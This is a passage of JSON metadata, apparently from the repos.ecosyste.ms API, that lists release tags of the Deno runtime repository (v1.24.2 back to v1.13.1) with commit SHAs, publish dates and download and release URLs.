2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13